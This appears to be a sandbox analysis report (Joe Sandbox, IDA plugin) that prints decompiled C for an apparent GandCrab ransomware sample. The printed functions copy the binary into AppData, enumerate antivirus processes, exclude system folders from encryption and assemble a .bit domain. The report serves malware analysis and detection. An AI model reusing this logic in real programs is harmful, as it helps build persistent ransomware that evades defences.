                                        					_t67 = 0;
                                        					_t50 = 0;
                                        					__eflags = 0;
                                        				} else {
                                        					_t3 =  &(_t24[0x101]); // 0x202
                                        					_t65 = _t3;
                                        					_v32 = 0x404;
                                        					_t50 = _t65;
                                        					_t67 = _t24;
                                        					_t64 =  &(_t65[0x101]);
                                        				}
                                        				_v28 = _t67;
                                        				GetModuleFileNameW(0, _t67, 0x100);
                                        				GetTempPathW(0x100, _t50);
                                        				_t6 =  &(_t50[1]); // 0x204
                                        				_t27 = E0F9D8090(_t67, _t6);
                                        				_t75 = _t27;
                                        				if(_t27 == 0) {
                                        					_v20 = 0x520050;
                                        					_v8 = 0;
                                        					_push(0x52);
                                        					_v16 = 0x440049;
                                        					_v12 = 0x520055;
                                        					E0F9D8150( &_v20, lstrlenW( &_v20));
                                        					_t72 = _t71 + 4;
                                        					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
                                        					_t13 =  &(_t50[1]); // 0x2
                                        					_t54 = _t67;
                                        					_t33 = E0F9D8090(_t54, _t13);
                                        					__eflags = _t33;
                                        					if(_t33 == 0) {
                                        						lstrcatW(_t50, L"\\Microsoft\\");
                                        						lstrcatW(_t50,  &_v20);
                                        						lstrcatW(_t50, L".exe");
                                        						_push(_t54);
                                        						_t38 = E0F9D2890(_v28, _t50);
                                        						_t72 = _t72 + 4;
                                        						__eflags = _t38;
                                        						if(_t38 == 0) {
                                        							goto L17;
                                        						}
                                        						_t40 = lstrlenW(_t50);
                                        						__eflags = _v28;
                                        						_t56 = 0xa + _t40 * 2;
                                        						if(_v28 == 0) {
                                        							L13:
                                        							_t64 = 0;
                                        							__eflags = 0;
                                        							L14:
                                        							_push(_t50);
                                        							L15:
                                        							wsprintfW(_t64, L"\"%s\"");
                                        							_t57 = _t64;
                                        							goto L16;
                                        						}
                                        						__eflags = _v36 + _t56 - 0x800;
                                        						if(__eflags < 0) {
                                        							goto L14;
                                        						}
                                        						goto L13;
                                        					}
                                        					_t46 = lstrlenW(_t67);
                                        					__eflags = _v28;
                                        					_t58 = 0xa + _t46 * 2;
                                        					if(_v28 == 0) {
                                        						L8:
                                        						_t64 = 0;
                                        						__eflags = 0;
                                        						L9:
                                        						_push(_t67);
                                        						goto L15;
                                        					}
                                        					__eflags = _v36 + _t58 - 0x800;
                                        					if(__eflags < 0) {
                                        						goto L9;
                                        					}
                                        					goto L8;
                                        				} else {
                                        					_t57 = _t67;
                                        					L16:
                                        					E0F9D2960(_t57, _t75);
                                        					L17:
                                        					ExitThread(0);
                                        				}
                                        			}
                                        0x0f9d2ad6
                                        0x0f9d2aea
                                        0x0f9d2af0
                                        0x0f9d2af4
                                        0x0f9d2af6
                                        0x0f9d2b00
                                        0x0f9d2b1c
                                        0x0f9d2b1e
                                        0x0f9d2b1e
                                        0x0f9d2b02
                                        0x0f9d2b02
                                        0x0f9d2b02
                                        0x0f9d2b08
                                        0x0f9d2b10
                                        0x0f9d2b12
                                        0x0f9d2b14
                                        0x0f9d2b14
                                        0x0f9d2b28
                                        0x0f9d2b2c
                                        0x0f9d2b38
                                        0x0f9d2b3e
                                        0x0f9d2b43
                                        0x0f9d2b48
                                        0x0f9d2b4a
                                        0x0f9d2b55
                                        0x0f9d2b62
                                        0x0f9d2b67
                                        0x0f9d2b6c
                                        0x0f9d2b75
                                        0x0f9d2b89
                                        0x0f9d2b8e
                                        0x0f9d2b9c
                                        0x0f9d2ba2
                                        0x0f9d2ba5
                                        0x0f9d2ba7
                                        0x0f9d2bac
                                        0x0f9d2bae
                                        0x0f9d2be4
                                        0x0f9d2bec
                                        0x0f9d2bf4
                                        0x0f9d2bf6
                                        0x0f9d2bfd
                                        0x0f9d2c02
                                        0x0f9d2c05
                                        0x0f9d2c07
                                        0x00000000
                                        0x00000000
                                        0x0f9d2c0f
                                        0x0f9d2c11
                                        0x0f9d2c16
                                        0x0f9d2c1d
                                        0x0f9d2c2c
                                        0x0f9d2c2c
                                        0x0f9d2c2c
                                        0x0f9d2c2e
                                        0x0f9d2c2e
                                        0x0f9d2c2f
                                        0x0f9d2c35
                                        0x0f9d2c3b
                                        0x00000000
                                        0x0f9d2c3d
                                        0x0f9d2c25
                                        0x0f9d2c2a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d2c2a
                                        0x0f9d2bb6
                                        0x0f9d2bb8
                                        0x0f9d2bbd
                                        0x0f9d2bc4
                                        0x0f9d2bd3
                                        0x0f9d2bd3
                                        0x0f9d2bd3
                                        0x0f9d2bd5
                                        0x0f9d2bd5
                                        0x00000000
                                        0x0f9d2bd5
                                        0x0f9d2bcc
                                        0x0f9d2bd1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d2b4c
                                        0x0f9d2b4c
                                        0x0f9d2c40
                                        0x0f9d2c40
                                        0x0f9d2c45
                                        0x0f9d2c47
                                        0x0f9d2c47

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F9D2AEA
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D2B2C
                                        • GetTempPathW.KERNEL32(00000100,00000000), ref: 0F9D2B38
                                        • lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F9D2B7D
                                          • Part of subcall function 0F9D8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                          • Part of subcall function 0F9D8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                          • Part of subcall function 0F9D8150: GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                          • Part of subcall function 0F9D8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                          • Part of subcall function 0F9D8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                          • Part of subcall function 0F9D8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                          • Part of subcall function 0F9D8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F9D2B9C
                                        • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F9D2BE4
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D2BEC
                                        • lstrcatW.KERNEL32(00000000,.exe), ref: 0F9D2BF4
                                        • wsprintfW.USER32 ref: 0F9D2C35
                                        • ExitThread.KERNEL32 ref: 0F9D2C47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                        • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                        • API String ID: 139215849-2398311915
                                        • Opcode ID: 366790f4bff83f47b6e17e53c1da527aa04f55fc77392764d0bc2271c6cedcb7
                                        • Instruction ID: 5bfa645b322da78216cd0de30451d37a07bd8da579e1f2a9c4deb6fbb3366e35
                                        • Opcode Fuzzy Hash: 366790f4bff83f47b6e17e53c1da527aa04f55fc77392764d0bc2271c6cedcb7
                                        • Instruction Fuzzy Hash: 7741F5702053119BE310DF30DC49B6B7B9CAFC4715F248828B646972C3DABCE958CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E0F9D7A10(void** _a4, intOrPtr* _a8) {
                                        				signed int _v8;
                                        				long _v12;
                                        				long _v16;
                                        				void* _v20;
                                        				void* _v24;
                                        				WCHAR* _v28;
                                        				WCHAR* _v32;
                                        				WCHAR* _v36;
                                        				WCHAR* _v40;
                                        				WCHAR* _v44;
                                        				WCHAR* _v48;
                                        				WCHAR* _v52;
                                        				WCHAR* _v56;
                                        				WCHAR* _v60;
                                        				WCHAR* _v64;
                                        				WCHAR* _v68;
                                        				WCHAR* _v72;
                                        				WCHAR* _v76;
                                        				WCHAR* _v80;
                                        				void* _t46;
                                        				void* _t49;
                                        				WCHAR* _t56;
                                        				void** _t68;
                                        				void* _t75;
                                        				long _t76;
                                        				WCHAR* _t77;
                                        				signed int _t79;
                                        				void* _t83;
                                        
                                        				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        				_t68 = _a4;
                                        				 *_t68 = _t46;
                                        				_v80 = L"AVP.EXE";
                                        				_v76 = L"ekrn.exe";
                                        				_v72 = L"avgnt.exe";
                                        				_v68 = L"ashDisp.exe";
                                        				_v64 = L"NortonAntiBot.exe";
                                        				_v60 = L"Mcshield.exe";
                                        				_v56 = L"avengine.exe";
                                        				_v52 = L"cmdagent.exe";
                                        				_v48 = L"smc.exe";
                                        				_v44 = L"persfw.exe";
                                        				_v40 = L"pccpfw.exe";
                                        				_v36 = L"fsguiexe.exe";
                                        				_v32 = L"cfp.exe";
                                        				_v28 = L"msmpeng.exe";
                                        				_t75 = VirtualAlloc(0, 4, 0x3000, 4);
                                        				_v24 = _t75;
                                        				if(_t75 == 0) {
                                        					L3:
                                        					return 0;
                                        				} else {
                                        					 *_t75 = 0x22c;
                                        					_t49 = CreateToolhelp32Snapshot(2, 0);
                                        					_v20 = _t49;
                                        					if(_t49 != 0xffffffff) {
                                        						_t79 = 0;
                                        						_push(_t75);
                                        						_v12 = 0;
                                        						_a4 = 0;
                                        						_v16 = 0;
                                        						_v8 = 0;
                                        						if(Process32FirstW(_t49) != 0) {
                                        							L6:
                                        							while(_t79 == 0) {
                                        								_t77 = _t75 + 0x24;
                                        								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
                                        									_t79 = _t79 + 1;
                                        									if(_t79 < 0xe) {
                                        										continue;
                                        									} else {
                                        										_t79 = _v8;
                                        									}
                                        									L15:
                                        									_t75 = _v24;
                                        									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) {
                                        										goto L6;
                                        									}
                                        									goto L17;
                                        								}
                                        								_push(_t77);
                                        								_push( *_t68);
                                        								_v16 = 1;
                                        								if(_a4 != 0) {
                                        									lstrcatW();
                                        									lstrcatW( *_t68, ",");
                                        								} else {
                                        									lstrcpyW();
                                        									lstrcatW( *_t68, ",");
                                        								}
                                        								_a4 =  &(_a4[0]);
                                        								_v12 = _v12 + lstrlenW(_t77) * 2;
                                        								_t79 =  >  ? 1 : _v8;
                                        								_v8 = _t79;
                                        								goto L15;
                                        							}
                                        							L17:
                                        							if(_v16 != 0) {
                                        								_t56 =  *_t68;
                                        								if( *_t56 != 0) {
                                        									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
                                        								}
                                        							}
                                        							 *_a8 = _v12;
                                        						}
                                        						VirtualFree(_t75, 0, 0x8000);
                                        						CloseHandle(_v20);
                                        						_t76 = _v16;
                                        						if(_t76 == 0) {
                                        							VirtualFree( *_t68, _t76, 0x8000);
                                        						}
                                        						return _t76;
                                        					} else {
                                        						VirtualFree(_t75, 0, 0x8000);
                                        						goto L3;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0F9D7A2D
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D7AA1
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F9D7AB6
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7ACC
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F9D7AEF
                                        • lstrcmpiW.KERNEL32(0F9E033C,-00000024), ref: 0F9D7B15
                                        • Process32NextW.KERNEL32(?,?), ref: 0F9D7B8E
                                        • GetLastError.KERNEL32 ref: 0F9D7B98
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D7BB6
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7BDB
                                        • CloseHandle.KERNEL32(?), ref: 0F9D7BE0
                                        • VirtualFree.KERNEL32(?,?,00008000), ref: 0F9D7BF5
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
                                        • String ID:
                                        • API String ID: 2470459410-0
                                        • Opcode ID: 1b39d51b24d8480b3ab4d190a72af685bd5cc9a29853e9dcce0d9426bf61c672
                                        • Instruction ID: d91eadc4ebab5028d79b61ab884f1f471c505cee8502c7aabc89bbb6d883896a
                                        • Opcode Fuzzy Hash: 1b39d51b24d8480b3ab4d190a72af685bd5cc9a29853e9dcce0d9426bf61c672
                                        • Instruction Fuzzy Hash: 6E51BE71A05218EBDB218FA4D848B9EBBB8FF85724F208059F500AB2D2D7B85954CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0F9D6640(void* __ecx) {
                                        				void* _t10;
                                        				intOrPtr* _t21;
                                        				void* _t45;
                                        				void* _t46;
                                        
                                        				_t46 = __ecx;
                                        				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
                                        				if(E0F9D8090(_t46, L"\\ProgramData\\") != 0 || E0F9D8090(_t46, L"\\Program Files\\") != 0 || E0F9D8090(_t46, L"\\Tor Browser\\") != 0 || E0F9D8090(_t46, L"Ransomware") != 0 || E0F9D8090(_t46, L"\\All Users\\") != 0 || E0F9D8090(_t46, L"\\Local Settings\\") != 0) {
                                        					L16:
                                        					VirtualFree(_t45, 0, 0x8000);
                                        					return 0;
                                        				} else {
                                        					_t10 = E0F9D8090(_t46, L":\\Windows\\");
                                        					if(_t10 != 0) {
                                        						goto L16;
                                        					} else {
                                        						_t21 = __imp__SHGetSpecialFolderPathW;
                                        						_push(_t10);
                                        						_push(0x2a);
                                        						_push(_t45);
                                        						_push(_t10);
                                        						if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
                                        							_push(0);
                                        							_push(0x2b);
                                        							_push(_t45);
                                        							_push(0);
                                        							if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
                                        								_push(0);
                                        								_push(0x24);
                                        								_push(_t45);
                                        								_push(0);
                                        								if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
                                        									_push(0);
                                        									_push(0x1c);
                                        									_push(_t45);
                                        									_push(0);
                                        									if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
                                        										VirtualFree(_t45, 0, 0x8000);
                                        										return 1;
                                        									} else {
                                        										goto L16;
                                        									}
                                        								} else {
                                        									goto L16;
                                        								}
                                        							} else {
                                        								goto L16;
                                        							}
                                        						} else {
                                        							goto L16;
                                        						}
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6653
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D66F2
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D670C
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6726
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6740
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6760
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6775
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                        • String ID: :\Windows\$Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
                                        • API String ID: 1363212851-2358141795
                                        • Opcode ID: 37cfdcb4eecc45faf3ac1ae2cc41a8a0902f3e6f99e1812a5e7fed6b1e8a32d4
                                        • Instruction ID: 63fb26e1ad6028de2f43eb3ec37fe6f1676d4bfc3e1055f10c589ee968b4916a
                                        • Opcode Fuzzy Hash: 37cfdcb4eecc45faf3ac1ae2cc41a8a0902f3e6f99e1812a5e7fed6b1e8a32d4
                                        • Instruction Fuzzy Hash: 5A312C2834071522F9A035B68E65B6F688E8BC1F95F74C415BB02DE2C3EF9DD9014699
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E0F9D5060() {
                                        				WCHAR* _v8;
                                        				intOrPtr _v12;
                                        				char* _v16;
                                        				char* _v20;
                                        				char* _v24;
                                        				char _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				char _v40;
                                        				char _v44;
                                        				char _v60;
                                        				short _v64;
                                        				char _v80;
                                        				WCHAR* _t26;
                                        				intOrPtr _t27;
                                        				long _t32;
                                        				WCHAR* _t37;
                                        				void* _t39;
                                        				signed int _t40;
                                        				signed int _t41;
                                        				signed int _t45;
                                        				void* _t48;
                                        				WCHAR* _t49;
                                        				void* _t52;
                                        				void* _t53;
                                        
                                        				asm("movdqa xmm0, [0xf9e04c0]");
                                        				_v24 =  &_v80;
                                        				asm("movdqu [ebp-0x4c], xmm0");
                                        				_v20 =  &_v60;
                                        				asm("movdqa xmm0, [0xf9e04d0]");
                                        				_v64 = 0x6e;
                                        				asm("movdqu [ebp-0x38], xmm0");
                                        				_v44 = 0;
                                        				_v40 = 0x646e6167;
                                        				_v36 = 0x62617263;
                                        				_v32 = 0x7469622e;
                                        				_v28 = 0;
                                        				_v16 =  &_v40;
                                        				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                        				_t37 = _t26;
                                        				_v8 = _t37;
                                        				if(_t37 != 0) {
                                        					_t40 = 0;
                                        					_t48 = 1;
                                        					_t45 = 0;
                                        					while(1) {
                                        						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x14));
                                        						_t45 = _t45 + 1;
                                        						_v12 = _t27;
                                        						if(_t45 == 3) {
                                        							asm("sbb esi, esi");
                                        							_t48 =  ~(_t48 - 1) + 2;
                                        							_t45 = 0;
                                        						}
                                        						if(_t40 == 0xffffffff) {
                                        							Sleep(0x3e8);
                                        						}
                                        						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
                                        						_t41 = _t39;
                                        						E0F9D4E90(_t41, _v12, _t48);
                                        						_t53 = _t53 + 4;
                                        						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
                                        						if(_t32 != 0) {
                                        							break;
                                        						}
                                        						VirtualFree(_t39, _t32, 0x8000);
                                        						_t37 = _v8;
                                        						_t40 = _t41 | 0xffffffff;
                                        					}
                                        					_t49 = _v8;
                                        					wsprintfW(_t49, L"%S", _t39);
                                        					VirtualFree(_t39, 0, 0x8000);
                                        					_t26 = _t49;
                                        				}
                                        				return _t26;
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0F9D50C6
                                        • Sleep.KERNEL32(000003E8), ref: 0F9D5103
                                        • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F9D5111
                                        • VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F9D5121
                                        • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F9D513D
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D514E
                                        • wsprintfW.USER32 ref: 0F9D5166
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D5177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                        • String ID: .bit$crab$fabian wosar <3$gand$n
                                        • API String ID: 2709691373-4182624408
                                        • Opcode ID: 90803cdf302baef34d2629e262a4b3c90835efaf7b2a7602b99ca774b972a45e
                                        • Instruction ID: 9c36e470d450ed4055a241a1299acd72cf4b3d47c7fc362c8ce505c983dfb3d8
                                        • Opcode Fuzzy Hash: 90803cdf302baef34d2629e262a4b3c90835efaf7b2a7602b99ca774b972a45e
                                        • Instruction Fuzzy Hash: 9D310671E04319A7EB11CFA8DC85BEE7BBCAB44314F204115F606B72C2E7B45A508B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			// Walks a structure of optional entries (flag, wide string, wide string) at __ecx and,
                                        			// for every entry whose flag is non-zero, adds lstrlenW() of both strings plus 4 to a running
                                        			// total; the field at +0x60 adds a fixed 0x14. Returns the accumulated character count.
                                        			E0F9D7140(intOrPtr* __ecx) {
                                        				int _t42;
                                        				int _t48;
                                        				int _t51;
                                        				int _t54;
                                        				int _t57;
                                        				int _t60;
                                        				int _t63;
                                        				int _t66;
                                        				int _t70;
                                        				int _t72;
                                        				void* _t75;
                                        				intOrPtr* _t86;
                                        				int _t88;
                                        				int _t89;
                                        				int _t90;
                                        				int _t91;
                                        				int _t92;
                                        				int _t93;
                                        				int _t94;
                                        				void* _t95;
                                        
                                        				_t40 = lstrlenW;
                                        				_t86 = __ecx;
                                        				_t75 = 0;
                                        				if( *__ecx != 0) {
                                        					_t72 = lstrlenW( *(__ecx + 8));
                                        					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
                                        					_t40 = lstrlenW;
                                        					_t75 = _t3 + _t72;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
                                        					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
                                        					_t70 = lstrlenW( *(_t86 + 0x10));
                                        					_t7 = _t95 + 4; // 0x4
                                        					_t75 = _t7 + _t70 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
                                        					_t94 = lstrlenW( *(_t86 + 0x20));
                                        					_t66 = lstrlenW( *(_t86 + 0x1c));
                                        					_t11 = _t94 + 4; // 0x4
                                        					_t75 = _t11 + _t66 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
                                        					_t93 = lstrlenW( *(_t86 + 0x2c));
                                        					_t63 = lstrlenW( *(_t86 + 0x28));
                                        					_t15 = _t93 + 4; // 0x4
                                        					_t75 = _t15 + _t63 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
                                        					_t92 = lstrlenW( *(_t86 + 0x38));
                                        					_t60 = lstrlenW( *(_t86 + 0x34));
                                        					_t19 = _t92 + 4; // 0x4
                                        					_t75 = _t19 + _t60 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
                                        					_t91 = lstrlenW( *(_t86 + 0x44));
                                        					_t57 = lstrlenW( *(_t86 + 0x40));
                                        					_t23 = _t91 + 4; // 0x4
                                        					_t75 = _t23 + _t57 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
                                        					_t90 = lstrlenW( *(_t86 + 0x50));
                                        					_t54 = lstrlenW( *(_t86 + 0x4c));
                                        					_t27 = _t90 + 4; // 0x4
                                        					_t75 = _t27 + _t54 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
                                        					_t89 = lstrlenW( *(_t86 + 0x5c));
                                        					_t51 = lstrlenW( *(_t86 + 0x58));
                                        					_t31 = _t89 + 4; // 0x4
                                        					_t75 = _t31 + _t51 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
                                        					_t75 = _t75 + 0x14;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
                                        					_t88 = lstrlenW( *(_t86 + 0x7c));
                                        					_t48 = lstrlenW( *(_t86 + 0x78));
                                        					_t36 = _t88 + 4; // 0x4
                                        					_t75 = _t36 + _t48 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
                                        					return _t75;
                                        				} else {
                                        					_t42 = lstrlenW( *(_t86 + 0x88));
                                        					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
                                        				}
                                        			}

                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                        • lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7288
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7296
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
